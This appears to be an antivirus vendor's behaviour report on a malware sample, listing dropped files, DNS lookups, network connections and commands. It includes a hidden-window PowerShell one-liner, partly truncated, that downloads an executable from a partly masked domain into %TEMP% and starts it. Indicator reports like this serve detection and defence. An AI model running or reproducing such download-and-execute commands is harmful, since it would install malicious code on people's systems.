Technical Information
- $ahxkroeenbmd as %temp%\ujwu-awk7.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function qhehmscvu7([String] $ahxkroeenbmd){(New-Object System.Net.WebClient).DownloadFile($ahxkroeenbmd,''%TEMP%\Ujwu-awk7.exe'');Start-Process ''%TEMP%\Ujwu-awk7....
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1400
- %TEMP%\mqm.bat
- %TEMP%\1331140.cvr
- 'we######4contractors.net':80
- 'we######4contractors.net':443
- http://we######4contractors.net/img/faersong.png
- 'we######4contractors.net':443
- DNS ASK um###t.weiz.at
- DNS ASK we######4contractors.net
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function qhehmscvu7([String] $ahxkroeenbmd){(New-Object System.Net.WebClient).DownloadFile($ahxkroeenbmd,''%TEMP%\Ujwu-awk7.exe'');Start-Process ''%TEMP%\Ujwu-awk7....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\mqm.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\mqm.bat" "